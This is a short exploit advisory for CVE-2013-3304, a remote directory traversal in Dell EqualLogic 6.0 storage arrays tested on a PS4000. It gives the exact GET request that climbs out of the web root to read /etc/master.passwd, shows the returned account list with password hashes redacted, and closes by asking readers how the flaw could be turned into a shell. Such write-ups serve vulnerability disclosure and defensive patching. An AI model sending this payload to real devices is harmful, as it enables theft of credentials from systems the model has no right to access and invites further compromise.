# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0 Storage
# Date: 09/2013
# Exploit Author: Mauricio Pampim Corrêa
# Vendor Homepage: www.dell.com
# Version: 6.0
# Tested on: Equipment Model Dell EqualLogic PS4000
# CVE : CVE-2013-3304

The malicious user sends

GET //../../../../../../../../etc/master.passwd

And the Dell Storage answers

root:[hash] &:/root:/bin/sh
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*:[hash]:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin

More information (in Brazilian Portuguese): https://www.xlabs.com.br/blog/?p=50

Could you obtain a shell with this flaw? Send me an email telling me how, to mauricio[at]xlabs.com.br

Thanks